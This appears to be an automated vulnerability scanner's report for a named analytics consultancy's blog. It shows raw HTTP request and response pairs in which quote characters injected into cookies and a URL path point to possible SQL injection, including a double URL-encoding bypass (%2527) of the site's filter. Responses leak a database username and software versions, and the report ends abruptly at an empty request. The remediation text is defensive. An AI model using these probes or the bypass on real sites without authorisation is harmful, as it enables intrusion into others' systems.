GET /blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=20 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)'; 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:58:33 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=20 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)''; 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:58:33 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ki_t cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:58:40 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527%2527; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:58:40 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:58:43 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:58:43 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 51581
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1'; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:55:41 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1''; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:55:42 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937'; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:59:15 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937''; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:59:15 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0'; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:56:45 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0''; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:56:45 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The d4dad6935f632ac35975e3001dc7bbe8 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the d4dad6935f632ac35975e3001dc7bbe8 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the d4dad6935f632ac35975e3001dc7bbe8 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:48:14 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:48:15 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:48:17 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:48:17 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 37445
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The 1ee73a388da0bb7ec3d7afe3beccac53 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 1ee73a388da0bb7ec3d7afe3beccac53 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/55-googleanalytics/95-more-dimensions-site-search-source-medium.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=15 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00'; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:52:27 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics/95-more-dimensions-site-search-source-medium.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=15 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00''; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:52:27 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the apros2.0_tpl cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/55-googleanalytics/95-more-dimensions-site-search-source-medium.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=15 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0%2527; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:59:36 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics/95-more-dimensions-site-search-source-medium.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=15 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0%2527%2527; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:59:37 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:59:39 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:59:39 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22780
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/55-googleanalytics/97-workshop-january-29th-dimensionator.html%2527 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 06:58:32 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
